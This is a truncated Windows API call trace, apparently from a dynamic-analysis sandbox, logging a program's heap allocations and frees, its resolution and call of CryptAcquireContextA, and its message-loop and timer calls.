0 [0120.029] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0120.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x14918f8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0120.029] GetProcAddress (hModule=0x77820000, lpProcName="CryptAcquireContext") returned 0x0 [0120.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0120.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1491b98, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0120.030] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff398 [0120.030] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b98 | out: hHeap=0x12c0000) returned 1 [0120.030] GetProcAddress (hModule=0x77820000, lpProcName="CryptAcquireContextA") returned 0x77840630 [0120.030] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff398 | out: hHeap=0x12c0000) returned 1 [0120.030] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7c0 | out: hHeap=0x12c0000) returned 1 [0120.030] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300bd0 | out: hHeap=0x12c0000) returned 1 [0120.030] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0120.030] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff320 [0120.030] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0120.030] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0120.030] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef700 [0120.030] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0120.030] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7c0 [0120.030] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0120.030] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0120.030] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0120.030] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0120.030] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7c0 | out: hHeap=0x12c0000) returned 1 [0120.030] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff320 | out: hHeap=0x12c0000) returned 1 [0120.031] CryptAcquireContextA (in: phProv=0x7df238, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x7df238*=0x148ef18) returned 1 [0121.039] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0121.039] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x133c448 [0121.039] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ad8 [0121.039] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8f8 [0121.039] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd778 [0121.039] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd940 [0121.039] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7f0 [0121.039] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd940 | out: hHeap=0x12c0000) returned 1 [0121.039] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.039] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd778 | out: hHeap=0x12c0000) returned 1 [0121.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd700 [0121.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd880 [0121.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7d8 [0121.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0121.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7d8 | out: hHeap=0x12c0000) returned 1 [0121.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd880 | out: hHeap=0x12c0000) returned 1 [0121.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd958 [0121.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd730 [0121.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd898 [0121.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7f0 [0121.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd898 | out: hHeap=0x12c0000) returned 1 [0121.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd730 | out: hHeap=0x12c0000) returned 1 [0121.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd730 [0121.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd808 [0121.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd910 [0121.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0121.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd910 | out: hHeap=0x12c0000) returned 1 [0121.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.040] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0121.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7f0 [0121.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8e0 [0121.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd808 [0121.040] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7f0 [0121.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd808 | out: hHeap=0x12c0000) returned 1 [0121.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8e0 | out: hHeap=0x12c0000) returned 1 [0121.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd778 [0121.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7a8 [0121.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd910 [0121.041] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7f0 [0121.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd910 | out: hHeap=0x12c0000) returned 1 [0121.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7a8 | out: hHeap=0x12c0000) returned 1 [0121.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0121.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff3e8 | out: hHeap=0x12c0000) returned 1 [0121.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6d0 | out: hHeap=0x12c0000) returned 1 [0121.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0121.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd400 | out: hHeap=0x12c0000) returned 1 [0121.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5c8 | out: hHeap=0x12c0000) returned 1 [0121.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd460 | out: hHeap=0x12c0000) returned 1 [0121.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd598 | out: hHeap=0x12c0000) returned 1 [0121.041] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd478 | out: hHeap=0x12c0000) returned 1 [0121.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0121.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4c0 | out: hHeap=0x12c0000) returned 1 [0121.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0121.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0121.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd550 | out: hHeap=0x12c0000) returned 1 [0121.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0121.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5b0 | out: hHeap=0x12c0000) returned 1 [0121.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd580 | out: hHeap=0x12c0000) returned 1 [0121.042] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd610 | out: hHeap=0x12c0000) returned 1 [0121.043] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5e0 | out: hHeap=0x12c0000) returned 1 [0121.043] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd9b8 | out: hHeap=0x12c0000) returned 1 [0121.043] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd820 | out: hHeap=0x12c0000) returned 1 [0121.043] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd790 | out: hHeap=0x12c0000) returned 1 [0121.043] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd760 | out: hHeap=0x12c0000) returned 1 [0121.043] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd868 | out: hHeap=0x12c0000) returned 1 [0121.043] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7c0 | out: hHeap=0x12c0000) returned 1 [0121.043] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd838 | out: hHeap=0x12c0000) returned 1 [0121.043] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd928 | out: hHeap=0x12c0000) returned 1 [0121.044] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd850 | out: hHeap=0x12c0000) returned 1 [0121.044] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd718 | out: hHeap=0x12c0000) returned 1 [0121.044] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14a32f8 | out: hHeap=0x12c0000) returned 1 [0121.044] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.044] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 1 [0121.044] TranslateMessage (lpMsg=0x7df8b4) returned 0 [0121.044] DispatchMessageW (lpMsg=0x7df8b4) returned 0x0 [0121.044] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0121.044] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0121.044] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.044] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff460 [0121.044] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd7d8 [0121.044] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0121.044] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.044] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919d8 [0121.044] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919d8 | out: hHeap=0x12c0000) returned 1 [0121.044] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0121.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd7d8 | out: hHeap=0x12c0000) returned 1 [0121.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff460 | out: hHeap=0x12c0000) returned 1 [0121.045] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.045] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff050 [0121.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd760 [0121.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0121.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0121.045] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x7df768 | out: lpSystemTimeAsFileTime=0x7df768*(dwLowDateTime=0xd9804765, dwHighDateTime=0x1d7b451)) [0121.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd760 | out: hHeap=0x12c0000) returned 1 [0121.045] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff050 | out: hHeap=0x12c0000) returned 1 [0121.045] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff2f8 [0121.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd8c8 [0121.045] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.046] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef700 [0121.046] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0121.046] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0121.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0121.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd8c8 | out: hHeap=0x12c0000) returned 1 [0121.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff2f8 | out: hHeap=0x12c0000) returned 1 [0121.048] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458d18 | out: hHeap=0x12c0000) returned 1 [0121.048] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.048] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0121.048] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0121.048] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491998 [0121.048] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491998 | out: hHeap=0x12c0000) returned 1 [0121.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0121.049] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.049] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ed8 [0121.049] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.050] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ed8 | out: hHeap=0x12c0000) returned 1 [0121.050] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6f0 [0121.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0121.050] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0121.050] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0121.050] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.051] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0121.051] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ad8 [0121.051] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.051] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ad8 | out: hHeap=0x12c0000) returned 1 [0121.051] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.051] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0121.051] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0121.051] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a98 [0121.051] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a98 | out: hHeap=0x12c0000) returned 1 [0121.053] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0121.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0121.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458918 [0121.055] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458918 | out: hHeap=0x12c0000) returned 1 [0121.055] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0121.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a38 [0121.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a38 | out: hHeap=0x12c0000) returned 1 [0121.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0121.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c98 [0121.055] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c98 | out: hHeap=0x12c0000) returned 1 [0121.055] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0121.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0121.055] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491a18 [0121.055] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491a18 | out: hHeap=0x12c0000) returned 1 [0121.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0121.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0121.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458998 [0121.056] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458998 | out: hHeap=0x12c0000) returned 1 [0121.056] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0121.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7f0 [0121.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918f8 [0121.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918f8 | out: hHeap=0x12c0000) returned 1 [0121.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0121.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0121.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a18 [0121.056] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.056] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a18 | out: hHeap=0x12c0000) returned 1 [0121.056] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0121.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0121.056] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b98 [0121.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b98 | out: hHeap=0x12c0000) returned 1 [0121.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0121.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0121.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c98 [0121.057] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.057] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c98 | out: hHeap=0x12c0000) returned 1 [0121.057] PeekMessageW (in: lpMsg=0x7df8b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df8b4) returned 0 [0121.057] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) 